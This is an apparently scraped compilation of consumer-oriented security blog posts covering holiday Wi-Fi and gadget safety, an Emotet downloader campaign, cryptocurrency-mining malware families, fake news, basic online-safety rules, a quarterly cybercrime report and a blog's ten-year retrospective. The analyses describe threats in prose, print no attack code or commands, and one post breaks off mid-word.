    And research conducted by McAfee confirms this very opinion with the majority Aussies surveyed not worried about the risks associated with Wi-Fi. In fact, 62% of people on holiday either don’t care or don’t bother ensuring they have a secure Wi-Fi connection. And 41% believe our personal information is as secure when we connect to public Wi-Fi on holiday as when we are home or at work. Eeek!!!

    Why Do We Need To Worry?

    In short, accessing dodgy Wi-Fi means you are more likely to get hacked which can cause you a world of pain! If you have connected to a Wi-Fi hotspot that has either been set up by a hacker or a hacker has broken in to, anything you send or share online – you are also sharing with the hacker: banking details, online shopping logins, social media passwords… the list goes on. And once the hacker has that information, he/she can access your accounts as if they were you.

    In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware aka malicious software.  Some hackers have been known to hack the Wi-Fi connection point itself to try and trick Wi-Fi users into downloading malicious software. Attractive, believable pop-ups appear on users’ screens offering free upgrade to commonly used software. However, clicking the link in the pop-up ad downloads the malicious software!

    What Should We Do To Stay Safe?

    Well, let me tell you I’m not staying home… holidays keep me going! So, what we need to do is spend just a little time implementing a few strategies so we can securely manage our kids and their online lives when we travel. Not only will this minimise the risk but just as importantly, the stress!

    Here is how I’ll be managing my boys and their Wi-Fi connections when we set off on our annual family vacation this year:

    1. Ban Free Wi-Fi

    If your kids just have to connect to Wi-Fi, ensure it is password protected option NOT a random free Wi-Fi. While this does not provide any guarantee of security, it is another layer of protection. However, no banking, financial or shopping transactions are to be undertaken on this Wi-Fi – no exceptions!

    2. Invest in a VPN

    A Virtual Private Network (VPN) is one of the best services you can sign up to. In simple terms, it creates a secure encrypted connection which means that anything you send or receive is safe. McAfee’s VPN, SafeConnect, provides bank-grade Wi-Fi encryption which means your personal data and online activities are kept private even when you are connected to public Wi-Fi.

    3. Update ALL Your Devices Before You Leave Home

    I know it is a pain but if the software and apps on your devices are not up to date, you’re essentially leaving a ‘back door’ open for a hacker. App creators and hardware vendors will release patches or updates when they become aware of a security vulnerability – so it is essential you have the latest and greatest installed before you walk out of your door!

    4. Turn Off Bluetooth When Not Using It

    This needs to become a family rule – just like turning off the lights before you leave the house! When your Bluetooth is active, hackers can see which networks you have connected previously. It then takes very little effort for them to copy these networks and fool your device into connecting with their Bluetooth devices. Within minutes, the hacker can steal your data, download malware and create a world of pain!

    5. Download Security Software for All Your Devices including Smartphones!

    Ensuring your devices are protected with comprehensive security software is the same as locking the backdoor and turning on the house alarm – common sense. McAfee’s Total Protection software provides protection for your entire fleet of devices and includes anti-virus and anti-malware software, a firewall, anti-spam functions, parental controls and a password management tool.

    So, don’t cancel your holiday. Managing Wi-Fi safely when you travel with kids is absolutely possible with just a little planning. And if Nana and Pop are joining you on vacation, please ensure they are up to speed with the family Wi-Fi rules too! With 85% of older Australians accessing the internet every day, they will very likely have their eye on the Wi-Fi too!

    Happy Christmas and Safe Travels!

    Alex xx

    The post Kids, Travel and Wi-Fi appeared first on McAfee Blogs.

    Emotet Downloader Trojan Returns in Force

    During the past couple of days, we have seen an increase in activity from Emotet. This Trojan downloader spreads by emails that lure victims into downloading a Word document, which contains macros that after executing employ PowerShell to download a malicious payload.

    We have observed Emotet downloading a variety of payloads, including ransomware, Dridex, Trickbot, Pinkslipbot, and other banking Trojans.

    During a wave of attacks in early December we discovered a campaign spreading the ransomware family HydraCrypt. The sample we received had a compilation date of December 5.

    The initial Word documents were downloaded from a number of URLs; some examples follow:

    • hxxp://URL/DOC/Invoice/
    • hxxp://URL/scan/New-invoice-[Number]/
    • hxxp://URL /scan/New-invoice- Number]/
    • hxxp://URL /LLC/New-invoice- Number]/

    The document topics are crafted to entice users to open them because they appear to impact our finances or official documentation.

    • Invoice
    • Paypal
    • Rechnung (with or without a number)
    • Dokumente vom Notar

    The documents have typical characteristics used by Emotet attackers. When a user opens the document, it claims the file is protected and asks the victim to enable the content, which launches the code hidden in the macros.

    In analyzing the macros, we see heavily obfuscated code to make detection difficult and cover up the real purpose of the document:

    The macro code uses a mix of command, wmic, and PowerShell to copy itself to disk, create a service, and contact its control server for a download URL.

    Emotet collects information about the victim’s computer, for example running processes, and sends encrypted data to the control server using a POST request:

    The specific user-agent strings used in these requests:

    • Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
    • Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
    • Mozilla/5.0(WindowsNT6.1;WOW64;rv:39.0)Gecko/20100101Firefox/38.0•Mozilla/5.0

    The payload samples are downloaded to %Windir%\System32 using a random name, either in GUID format or a five-digit random name.

    The control servers and URLs hosting the malicious documents are covered within McAfee Global Threat Intelligence, with which we provide coverage for the samples detected. The McAfee Advanced Threat Research team proactively monitors any new developments regarding Emotet.


    The new variants of Emotet are detected by McAfee DAT files as Emotet-FEJ!<Partial Hash> since December 3. Real Protection technology within McAfee Endpoint Security Adaptive Threat Protection provides zero-day detection of these new variants as Real Protect-SS!<Partial Hash>.

    The post Emotet Downloader Trojan Returns in Force appeared first on McAfee Blogs.

    Malware Mines, Steals Cryptocurrencies From Victims

    How’s your Bitcoin balance? Interested in earning more? The value of cybercurrency is going up. One way to increase your holdings is by “mining,” which is legal as long as it is done with the proper permissions. Using your own mining equipment or establishing a formal agreement for outsourcing are two methods. Hardware vendors such as Asus manufacture motherboards that are specifically tailored for mining cryptocurrency.

    Bitcoin mining involves complex mathematical calculations that are carried out by a computer’s hardware and result in transaction records. These records are added to the Bitcoin public ledger, the “blockchain.” The ledger keeps track of all transactions and verifies these transactions are legitimate.

    Cybercriminals are also attracted to online currency, which fuels much of their business, including malware purchases and ransomware payments. Cybercriminals would rather find outside computing power instead of using their own equipment because the price of a dedicated mining machine could exceed US$5,000. Cybercriminals often seek to bypass the agreement phase and maliciously introduce malware that will either use a victim’s computing power to mine for coins or simply locate and steal the user’s cryptocurrency.

    Three popular Bitcoin miners.


    The number of instances of mining malware has increased significantly, to 1.65 million victims this year, according to one report. That’s a lot of slowing machines and increased electricity costs. For individual users, the slowness and increased electricity bill may be trivial, and go unnoticed for a time. For businesses with hundreds or thousands of machines, however, the cost increase can be substantial.

    The increased interest in illegally mining or stealing cryptocurrencies correlates easily with the increased value of these currencies. One Bitcoin (BTC) was recently worth more than $7,500, up from around $3,000 a few weeks ago. Even considering an earlier decline in value, Bitcoin has been trending upward for years. This upswing in value and the recent adoption of Bitcoin in Japan and South Korea as a legal tender have increased the demand for acquiring Bitcoin and altcoins. In September cybercriminals stole $63,000 worth of cryptocurrency in about three months by taking advantage of a flaw in Microsoft Windows Internet Information Services.

    The price of Bitcoin since 2010. Source: CoinDesk.

    Initial coin offerings (ICOs) have also contributed to this gold rush. ICOs are similar to IPOs but instead of issuing to investors shares of a new company, the investors are given cryptocurrency in the hopes a new company will be successful and result in a higher value for their digital coins.

    During the last few years we have seen an increase in innovation by malware authors to infiltrate this space, resulting in malware that both mines or steals coins and spans various and platforms. Let’s break down some of the tools and techniques in the world of crypto-mining/-stealing malware that has arisen.

    • NightMiner
    • Adylkuzz
    • EternalMiner
    • MulDrop.14
    • ELF Linux/Mirai
    • OSX/Miner-D
    • Dridex
    • Trickbot
    • Jimmy Nukebot
    • HawkEye
    • Cerber
    • Web Mining


    NightMiner mining malware was first seen in the wild in March 2015 and has been used to mine the Monero cryptocurrency. Some cybercriminals have turned to Monero due to its built-in security features and lower cost to mine. For example, Monero by default supports many blockchain obfuscation and anonymity technologies such as stealth addresses and crypto notes. This malicious software has been discovered on network attached storage (NAS) devices and takes advantage of those devices’ powerful CPU and GPU resources. The mining software can stay under the radar on these devices because most administrators fail to install antimalware software on NAS systems. Sophos released an extensive report discussing this malware.


    Adylkuzz is more recent, coming on the scene in this year. The mining malware is similar to the well-known ransomware WannaCry in that it exploits two flaws in Microsoft’s server message block (SMB) that are known as EternalBlue and DoublePulsar. Both defects were leaked by the Shadow Brokers hacking group and are believed to be the work of the U.S. National Security Agency’s Equation Group. Adylkuzz is unique in that it will block all access to TCP Port 445, preventing other malware from taking advantage of the SMB flaws.

    Code snippet from the EternalBlue Metasploit module.


    Linux systems are not immune. EternalMiner took advantage of a vulnerability in Samba to infect as many systems as possible. The flaw allowed Samba servers to load and execute code remotely after a shared library was uploaded by a malicious client. A patch to address the seven-year-old flaw was released in May, but cybercriminals made thousands of dollars before network administrators could update their servers.


    Researchers have seen instances of Raspberry Pi—a small, versatile single-board computer— attacked by the crypto mining malware Linux.MulDrop.14. The malicious software does not attempt to mine the CPU-intensive Bitcoin but, like NightMiner, focuses on Monero. This action shows a level of innovation as cybercriminals expand their scope to acquire cryptocurrencies across additional platforms.

    ELF Linux/Mirai

    Cryptocurrency malware mining has been discovered in connection with the Mirai botnet. ELF Linux/Mirai continues to evolve and has added a Bitcoin miner slave module, allowing the malware to mine cryptocurrency from thousands of infected IoT devices, according to a report from IBM X-Force. Mirai, discovered in August 2016, infected IoT devices and has also been responsible for several DDoS attacks, including against DNS provider Dyn and Liberia’s Internet infrastructure.


    Source: McAfee Labs Threats Report, March 2017


    Although Apple’s Mac OS has not been heavily targeted, it is also not immune. OSX/Miner-D both steals Bitcoins and mines a system. This malware has been around since 2011 and is the second most common malware on the Mac. The malware, which is inserted into legitimate apps uploaded to torrent sites, made a surge early this year and resulted in more than 20% of all detections in May. We expect to soon see new variants of this malicious software.


    Cryptocurrency mining has caught the attention of the Dridex Trojan’s developers. Dridex is a banking Trojan that steals credentials to access accounts. Samples of this malware were discovered in 2016 that find and steal cryptocurrency wallets.

    Dridex is sophisticated malware. The developers behind this malware continue to evolve its code to avoid detection, increase infections, distribute ransomware, steal banking and personal information, and now pilfer Bitcoins.


    The cybercriminals behind Trickbot have added the capability to steal cryptocurrency. Trickbot has been around for years and has recently added as one of its attack vectors. Once a system is infected, the malware monitors the victim’s browsing habits and injects a fake login page whenever the user visits The fake page allows criminals to steal the login information, resulting in the theft cryptocurrencies including Bitcoin, Ethereum, and Litecoin as well as other digital assets. 

    Jimmy Nukebot

    Another Trojan making headlines is Jimmy Nukebot. The authors behind the malicious software used code from the NeutrinoPOS banker Trojan. This variant, detected by McAfee as RDN/PWS-Banker, does not steal bank card data as before but installs various modules that contain a payload. One payload mines Monero. The digital wallet associated with the miner has received only about $45, which may indicate the malware authors either changed wallets or have stopped mining, according to Kaspersky.

    McAfee Labs detections for some variants of mining malware. Peek detections are the highest number of detection occurrences on a single date in 2017.


    The credential harvesting malware HawkEye, which surfaced in 2014, has added Bitcoin wallet stealing to its arsenal. The malware is well known for stealing a variety of credentials from web browsers and mail clients. Recent samples show HawkEye targeting the file wallet.dat, which holds the user’s Bitcoin private keys along with other transaction information.


    Developers behind most ransomware prefer the ransoms be paid using cryptocurrency. In the recent case of Cerber, however, the actors have resorted to stealing the coins from the wallet before encrypting the system. Cerber is one of the most prolific ransomware families, infecting millions of computers worldwide. The ransomware has seen a decline in the past few months but continues to wreak havoc.

    The number of Cerber samples detected during the last 90 days. Source: Ransomware Tracker.

    Web Mining

    One new trend is a technique that mines cryptocurrency when visitors connect to websites. Coinhive and Crypto-Loot, as well as others, sell Monero mining software that allows the buyer to insert JavaScript into websites. The JavaScript mines cryptocurrency by using the site visitor’s CPU power. The service has been a hot topic since it first appeared because the software can be used maliciously to allow cybercriminals to mine cryptocurrency without users consent. A few legitimate sites, including The Pirate Bay and a major television company, have recently been found using the software to mine Monero. The entertainment conglomerate has removed the code but it remains unclear whether hackers injected the software or if the company included the code to make a few extra dollars while unsuspecting users were watching their favorite shows.

    The Pirate Bay has also removed the mining code and released a statement claiming the 24-hour test was designed to see if the popular file-sharing site could use the miner to generate revenue and potentially replace ads. A few other sites, including Iridium and PublicHD, are using the JavaScript code openly: Both sites inform their users of the code and in the case of Iridium allow them to opt out. The unsuspected use of web miners has caused some websites to go dark. Internet provider Cloudflare began shutting down domains after the company discovered Coinhive’s software mining Monero from visitors to torrent site ProxyBunker. The domains, which were shuttered for not allowing users to opt out, were reopened after removing the mining code.

    JavaScript code from Iridium’s Google Chrome miner extension.

    Crypto mining is not new, but it has gained attention due to the popularity of cryptocurrency, ICOs, and the overall value increase of alt coins. As the adoption rate for cryptocurrency grows, we can expect cybercriminals to increasingly illegally mine or steal cryptocurrency. They can exploit online funds to shop on the dark web or in exchange for real currency.

    A timeline of leading cryptocurrency miners.

    The post Malware Mines, Steals Cryptocurrencies From Victims appeared first on McAfee Blogs.

    Don’t Let the Grinch Hack Your Christmas!

    What’s on your family’s Christmas list this year? Let me guess – technology! Our desire for shiny, fast, connected devices is almost a biological condition this time of year. However, our single-minded desire to get these devices in our hands at all costs, often means we forget about the risks…

    To try and understand how us Aussies are planning on managing the risks associated with this season’s must-have Christmas gifts, McAfee Australia interviewed over 1000 Aussies aged 18-55. Participants were asked whether they were planning on buying internet-connected gifts this Christmas, how they plan to buy them and what they know about how to secure their new devices. And the findings were very interesting…

    • Online shopping is Booming But We Are Taking Risks!

    76% of us are likely to purchase gifts online this coming holiday season – an increase of 2% from last year. And while most of us will purchase from online stores of well-known retailers,

    some of us (18%) will choose stores that we find randomly through online shopping searches.

    • There Is Still Confusion About Protecting Our Devices

    90% of us feel it is important that our online identity and connected devices are safe and secure but alarmingly, only 14% of us feel that it is necessary to protect devices with security software – down from 15% in 2016.

    • Our Devices are Collecting Our Information But Most of Us Are OK with It

    Many consumers (76%) believe their devices are collecting their personal information

    • Some of Us ‘Need’ The Latest Devices At All Costs

    Despite acknowledging that our chosen device may be susceptible to security breaches, 22% of us still commit to buying it!

    There is no doubt we value our digital assets with 61% of us believing their digital assets (our online files and media) are worth more than $1000 and 34% worth more than a whopping $5000!!

    So, What Does This All Mean?

    There is no doubt that we love our technology! In fact, in recent research from Telefonica, we are ranked 3rd worldwide when it comes to embracing technology. We even beat the Japanese!

    However, the way we shop online, protect (or not) our devices and share our information plays a major role in how easy (or not) it is for cybercriminals to hack us, putting our much-loved digital assets at risk. And add a dose of Christmas cheer (and chaos) into the mix – and you can see how the risk increases!

    Which Are The Most Hackable Devices?

    To minimise the chance of the Grinch (aka cybercrims) ruining our Christmas this year, McAfee Australia has compiled a list of the devices most Australians have nominated as top of their Christmas lists. Each of the device’s security vulnerabilities has then been highlighted so you can take the required steps to ensure you are not hacked!! Here’s the lowdown:

    1. Laptops, Smartphones and Tablets

    According to our McAfee experts, laptops, smartphones and tablets take out first place for being the ‘Most Hackable’ gifts for Christmas 2017! As soon as those Christmas decorations come out, so do the sexiest models about. Slim, powerful yet light PCs, laptops and smartphones packed with the latest features and apps fill the stores… and we go into a frenzy!

    Risks: Malware, especially ransomware, continues to dominate the headlines and has grown to more than 10 million samples worldwide. Just like laptops and PCs, tablets and smartphones are vulnerable to ransomware and can be compromised.

    Tips: Slow down and think before clicking. One of the easiest ways for cybercriminals to infect your PC or smartphone is through malicious links. Be sceptical if you receive a link you are not expecting, use comprehensive security software that is kept updated, and install parental controls on all your children’s devices.

    2. Drones

    Drones won second place this year in the ‘Most Hackable’ stakes and it seems we can’t get enough of them. US drone sales are expected to top US$1 billion (A$1.3 billion) in 2017, up from US$799 million (A$1.04 billion) in 2016. And what a terrific gift – perfect for the amateur flight enthusiast through to the professional photographer looking to get that unique angle from up high!

    Risks: Drones can be vulnerable in multiple ways. While it’s true they can be hacked in flight, they can also emit a Wi-Fi signal designed to steal your personal information after connecting.

    Tips: Always keep the software updated on your drone, and apply software patches when they are made available from the manufacturer.  Be careful about connecting to unsecured Wi-Fi networks. If you must connect, do so with a Virtual Private Network (VPN) like McAfee Safe Connect.

    3. Digital Assistants

    The must-have tech gadget of 2017, the Digital Assistant comes in at 3rd place on the ‘Most Hackable’ honours list. Digital Assistants are without doubt the perfect gift for anyone. However, like any connected device digital assistants can also be the target of cybercriminals. As new technology comes to market the cybercriminals are always trying to stay a step ahead – Digital Assistants are no exception!

    Risks: Built-in microphones that are always listening for a wake-up command and, in some cases, cameras, can be compromised and turned into listening devices.

    Tips: Just like your smartphone or PC, be sure to keep your device’s software up-to-date, and never allow physical access to anyone you do not trust.

    4. Connected Toys

    Coming in at 4th place, Connected Toys seem to be featured on every mini digital native’s Christmas list this year. Many of the must-have connected toys come equipped with GPS chips, cameras and an interactive conversation ability making them super attractive!

    Risks: Be aware of the privacy and security risks that could affect connected toys. Manufacturers may not be putting the device’s security as a top priority which could leave it vulnerable to leaking personal information, location, or even allow a hacker to hijack the camera or microphone.

    Tips: Research before you buy to make sure the toy you plan to purchase has not had any reported security issues. If the toy comes with a default password, ensure you change it to something more secure. Finally, monitor children when they are playing with connected devices and turn the toy off when it’s not in use to ensure that their privacy is being protected.

    5. Connected Appliances

    Vacuums, refrigerators, bathroom scales and cameras that connect to the internet aka ‘connected appliances’ are also on hackers’ lists this year. I’m very partial to some of these devices – they just make modern life so much easier!

    Risks: While an attack on your refrigerator is unlikely, it’s not unheard of for connected home appliances to be hijacked and used as a pawn in a distributed denial of service attack (DDoS). A connected appliance could also leak personal information or provide details about your home, like its size and dimensions, making you a bigger target for cybercriminals.

    Tips: Do not allow your connectable devices to connect to the internet without any filtering. Always change your connected devices’ default manufacturer passwords to something strong and complex. Read the privacy policies provided by manufacturers so you know exactly what information your device is collecting.

    Before you start wrapping up your shiny tech Christmas gifts, please make sure you have a plan in place to protect the device from a Christmas hack. Why not write share a few of the above tips with the lucky recipients in their Christmas card? Or better still, why not spend a little time on Christmas Day working through it together. A great Christmas bonding exercise!

    Happy Christmas!

    Alex x

    The post Don’t Let the Grinch Hack Your Christmas! appeared first on McAfee Blogs.


    The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequence got out of hand when illiterate tribals in a remote Indian district received a Whatsapp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of upto 500 people pounced on strangers who they suspected to the child kidnappers, in all there were two incidents where 7 people were lynched.
    It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

     As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

    Creation of fake news is extremely simple. Listed below are six commonly used methods

    ·         Individuals concoct their own stories

    ·         Marketers release competitive advertisements based on unproven data

    ·         Groups with vested interests manipulate the volume and narrative of news.

    ·         Photographs are morphed

    ·         Old photographs are used to depict recent events

    ·         Real photographs are used to defame

    Obviously, it is also quite easy to catch the perpetrator. A few years back, a twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other type of content that results in incitement or defamation attract stronger penalties and jail terms. Police are more aware and vigilant.
    Most cybercitizens unwitting help fake news go viral by recirculating it. It creates a sense of belief that it must be true because the other person must have validated the news before sending it.

    Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
    Cybercitizens, do take care when crafting messages on social media – a little mischief may provide you a few years in government paid accommodation – Jail. Advise your children to be responsible and do cross check news received over social media before recirculating or believing in it.

    Twelve Commandments that will never fail to Keep You Cyber Safe Online

    As the digital world explodes with a variety of new online services, cyber threats have become more ingenuous, dangerous, and spawned multiple variants and types. As each new threat makes the headline, the accompanying set of threat specific security recommendations confuses cybercitizens. Cybercitizens want a comprehensive list of recommendations that do not change frequently.

    There are twelve foundational security practices that will help keep you and your family safe. Practicing them will harden your defenses against cybercrime and also reduce the negative effects of social media use.

    1)    Thou shalt not use a device with pirated software
    Pirated software is not patched as it is unlicensed. Unpatched software have security vulnerabilities which can be easily exploited to steal data and credentials

    2)    Thou shalt not use a device which is not set for automatic updates of Operating System patches
    Automatic patching for personal devices is the best way to ensure that the latest security patches are applied and security loopholes closed before cybercriminals can get to them

    3)    Thou shalt not use a device without updated antimalware (antivirus) software installed
    Antimalware software reduces the probability of a malware infection (e.g. ransomware) on your device. For it to be effective to catch the latest malware variants, it has to be automatically updated with the latest updates.

    4)    Thou shall not download pirated movies, games and other such material
    Something free may turn out to be expensive, both financially and to your reputation. Malware is usually bundled with pirated content or applications

    5)    Thou shall not use a site without trying to verify its authenticity
    Authenticity of a site can be verified by the Lock Icon and accompanying digital certificate. While not fool proof, it reduces the possibility of spoofed lookalike sites designed to steal your credentials

    6)    Thou shall not ignore inappropriate content on social networks, always report or dislike it
    Inappropriate content influences the minds of our children as they stumble upon it online. Hate content in particular may induce biases which take a long time to reverse.

    7)    Thou shalt not indulge or encourage cyber bullying online
    A parent or teacher has the additional responsibility of guiding children on the right online behavior. You do not want your children to bully or be bullied

    8)    Thou shalt not use passwords that can be easily guessed and promise to  keep the password a secret
    Try to choose complex passwords, do not reuse them on multiple sites and always store them securely. The easiest way to get into your online accounts is by stealing your passwords

    9)    Thou shalt not fall be tempted by fraudulent emails promising financial windfalls or miracle cures or cheap medicines
    Try to check the authenticity of the email. Electronic communication is easily manipulated, as it is difficult to verify the authenticity of the sender. Scams like these can cost you money and affect your health.

    10) Thou shall not forsake your responsibility of helping your older parents or young kids to be safe as they use the internet
    Be a guide and easily available as both old and young learn to use the internet and face cyber risks. Being available, requires that you can be reached for instant advice on problems they encounter

    11) Thou shalt never trust a stranger blindly online
    Always be suspicious when dealing with online strangers. At any point during the relationship never let down your guard. The identity of an online person cannot be easily verified. It can however be easily manipulated. Online friends sometimes have the vilest of intention which can lead to all forms of blackmail, particularly if they have incriminating pictures and videos. Besides adults, young children are potential victims

    12) Thou shalt not set a weak password for your mobile phone or keep it unlocked
    A stolen phone with an easy to guess password or if unlocked, is a sure invitation into all your signed in accounts and personal data. A large number of phones are left unattended or lost each year.

    Cybercrime Surges in Q3

    young man with glasses sitting in front of his computer, programming. the code he is working on (CSS) can be seen through the screen.

    PandaLabs Q3 Report indicates that incidences of cybercrime continue to increase, with 18 million new malware samples captured this quarter – more than 200,000 samples daily.

    The Quarter at a Glance

    Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

    Hackers have taken to developing new variants of successful Ransomware such as Locky, and the development of a model known as Ransomware-as-a-Service (RaaS), whereby developers create Ransomware for distributors, these distributors then target and infect victims – allowing both parties to achieve greater profits.

    Another key development was the occurrence of DDoS attacks. Most natably that of Cyber Security journalist Brian Krebs. Krebs exposure of vDoS lead to the arrest of its key members and subsequently made Krebs’ site the target of a massive DDoS attack that saw Google step in to restore the site. As one of the largest attack of its kind, hackers leveraged IoT devices to send 620GB of data per second – at its peak – to the site.
    This quarter cyber-attacks targeted multiple gaming sites, gaining access to millions of users’ personal information. These attacks were largely launched using botnets composed of smartphones, and effected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and mobile game Clash of the Kings were targeted. These highlight just a few incidences in the Gaming world in the last 3 months.

    The Banking sector remained a target for hackers as attacks on ATM’s, POS terminals and Bitcoin wallets continue to become more frequent and more advanced.

    A Taiwanese ATM attack this quarter indicated just how advanced cybercriminals have become when they were able to hack the banks internal network and withdraw over R28 million without even touching the ATM itself.

    Another big victim was Yahoo – one of the biggest attacks of its kind revealed this quarter indicated that 500 million user accounts had been comprised in a 2014 attack.

    Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

    View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc

    The post Cybercrime Surges in Q3 appeared first on

    Ten Years of Cybercrime & Doing Time

    On October 10, 2006 while I was sitting in my office at Energen I decided to start a blog.  I had been an InfraGard member for five years at that time, and was realizing based on the feedback I was getting from other InfraGard members around the country that while many people knew about Cyber Security, very few knew about CyberCrime.  I was working on a daily basis with the FBI Cybercrime Squad in Birmingham, so I had a fairly good view on the topic, so I decided to try to share what I knew by starting this blog.  One year later I had taken things to a whole new level by quitting my job at the Oil & Gas company and moving to the University of Alabama at Birmingham to dedicate the next decade to training new cybercrime fighters!

    While the blog has seen ups and downs in the regularity of the posts, even being named "Most Popular Security Blog" by SC Magazine back in 2010, overall we've averaged one post per week and have been visited by nearly 3 million readers.

    As I tried to decide how to mark the 10th Anniversary of the blog, I thought one way to do it would be to share what has been our most popular stories each year.

    One of the strengths of the blog has always been to document "big campaigns" that are attacking people and try to help them understand the nature of the scam so that they could avoid being a victim themselves.  The three most popular stories on the blog have all been of that nature:

    1. "More ACH Spam from NACHA" (March 11, 2011) and "ACH Transaction Rejected payments lead to Zeus" (Feb 25, 2011) were both of that type.  Even years later, spikes in visitors to these stories were an indication that someone was imitating NACHA again.   In these spam campaigns, the spammers would claim to be sending email from the  "National Automated Clearing House Association" the organization that handles all electronic payments between American banks.  We later came to call these type of campaigns "Soft-Targeting" as most Americans have never heard of NACHA, but those who are involved in regularly moving money most certainly would have -- making them also the most likely to fall victim to such a spam message.  The first entry in this series, "Newest Zeus = NACHA: The Electronic Payments Association" (November 12, 2009) was also very popular.

    2. Coming much later, November 7, 2014, was "Warrant for your Arrest phone scams." It was great to see the heavy traffic to that blog post and receive the emails letting me know that someone had just "proven" to them that they were about to be scammed by sending them a link to the article!

    3. During 2014 one of the largest spamming botnets was the ASProx botnet.   This malware blasted out high volume spam campaigns that used a variety of social engineering ploys to make their campaigns convincing, leading to huge victimization rates.   The most popular, based on hits to the blog, was the E-Z Pass Spam.  "E-Z Pass Spam Leads to Location Aware Malware" (July 8, 2014) had tens of thousands of visitors.  A close second, also ASProx, was "Urgent Court Notice from GreenWinick Lawyers delivers malware."   ASProx had been dominate from the holiday season in 2013, when "package delivery failure" messages really hit a profound number of victims.  (See for example "Holiday Delivery Failures Deliver Kuluoz Malware" (December 26, 2013)

    Rather than go through the top campaigns in order, I thought it might be more interesting to see the most popular posts for each of our ten years as a blog.

    Top Cybercrime & Doing Time Blog Posts of 2016
    Vovnenko / Fly / MUXACC1 pleads guilty24JAN2016
    Kelihos botnet delivering Dutch WildFire Ransomware09JUL2016
    Is the Bank of Bangladesh ready for the Global Economy?23APR2016
    Unlimited ATM Mastermind Ercan Findikoglu pleads guilty06MAR2016

    In 2016, two of our four top stories were about arrests of top cybercriminals, which is a trend that I love to say is growing and rising as we see a higher level of cooperation internationally, and a growing ability among our Law Enforcement partners. One of the highest volume spam botnets, Kelihos, is regularly in our blogs and is quite popular with the readers, indicating how often they also see the spam. The Bank of Bangladesh SWIFT theft was also a high interest story!

    Top Cybercrime & Doing Time Blog Posts of 2015
    Tech Support "pop-ups"30MAR2015
    Hillary"s Email Server and the New York City malware03OCT2015
    Passwords, Password Cracking, and Pass Phrases29OCT2015
    Darkode guilty pleas: Phastman, Loki, & Strife24AUG2015

    In 2015, the Darkode forum was a top story for us. Readers responded well to the Tech Support "pop-up" scams, indicating that they were also seeing it quite a bit! Hillary's email server gave us a chance to show the value of a long-term spam repository. And the story on password cracking seems to be regularly accessed from people teaching others about strong passwords.

    Top Cybercrime & Doing Time Blog Posts of 2014
    Warrant for Your Arrest phone scams07NOV2014
    E-ZPass Spam leads to Location Aware Malware08JUL2014
    Urgent Court Notice from GreenWinick Lawyers delivers malware13JUL2014
    GameOver Zeus now uses Encryption to bypass Perimeter Security02FEB2014

    The phone scams claiming that a warrant has been issued for your arrest have been popular on a daily basis for most of the two years since this story was first released. EZ Pass and Urgent Court Notice spoke to the popularity of the ASProx botnet. Gameover Zeus was also quite interesting as it changed the way spam-delivered malware defeated perimeter security.

    Top Cybercrime & Doing Time Blog Posts of 2013
    Holiday Delivery Failures lead to Kuluoz malware26DEC2013
    Vietnamese Carders arrested in case05JUN2013
    When Parked Domains Still Infect - and ZeroPark10AUG2013
    New Spam Attack accounts for 62% of our spam!10APR2013

    Kuluoz, later called ASProx, had its first big Christmas in 2013. One of the first arrests of Vietnamese hackers spoke to internationally cooperation.

    Top Cybercrime & Doing Time Blog Posts of 2012
    Operation Open Market: The Vendors25MAR2012
    Paypal "You Just Sent a Payment" spam leads to malware01MAY2012
    DNS Changer: Countdown clock reset, but still ticking28MAR2012
    Operation Open Market: Jonathan Vergnetti17MAR2012

    In 2012, the DNS Changer malware was on everyone's minds (we later blogged about the successful prosecution of the leaders of that campaign, all now in prison in New York.) Operation Open Market was the big Forum take-down that year.

    Top Cybercrime & Doing Time Blog Posts of 2011
    More ACH Spam from NACHA11MAR2011
    ACH Transaction Rejected payments lead to Zeus25FEB2011
    Federal Reserve Spam14MAR2011
    The Epsilon Phishing Model08APR2011

    I've already mentioned the ACH/NACHA spam campaigns that delivered Zeus. The Epsilon Phishing model focused on hacking email delivery services and using validated accounts to deliver phishing and malware. (This is the group that Neil Schwartzman of CAUCE labeled "The Adobers" for the many times their malware claimed to be Adobe software.)

    Top Cybercrime & Doing Time Blog Posts of 2010
    New York FBI: 17 Wanted Zeus Criminals30SEP2010
    PakBugs Hackers arrested12JUL2010
    Lin Mun Poo: Hacker of the Federal Reserve and ...?20NOV2010
    Iranian Cyber Army returns - target: Baidu.com12JAN2010

    The Iranian Cyber Army, and a variety of international cyber criminals captured the headlines in 2010.

    Top Cybercrime & Doing Time Blog Posts of 2009
    Newest Zeus = NACHA: The Electronic Payments Association12NOV2009
    The FBI's Biggest Domestic Phishing Bust Ever08OCT2009
    Who is the "Iranian Cyber Army"? Twitter DNS Redirect18DEC2009
    Traveler Scams: Email Phishers Newest Scam09FEB2009

    Our 2009 "Traveler Scams" post was for years the most successful post on the blog, as many people shared the post with their friends to warn about the scam. NACHA was just becoming the leading scam-victim related to Zeus, and the FBI celebrated a huge phishing victory!

    Top Cybercrime & Doing Time Blog Posts of 2008
    The UAB Spam Data Mine: Looking at Malware Sites09AUG2008
    Anti-Virus Products Still Fail on Fresh Viruses12AUG2008
    ICE: Operation Predator - Solving Intertwined Child Porn cases05NOV2008
    Bank of America Demo Account - DO NOT CLICK26NOV2008

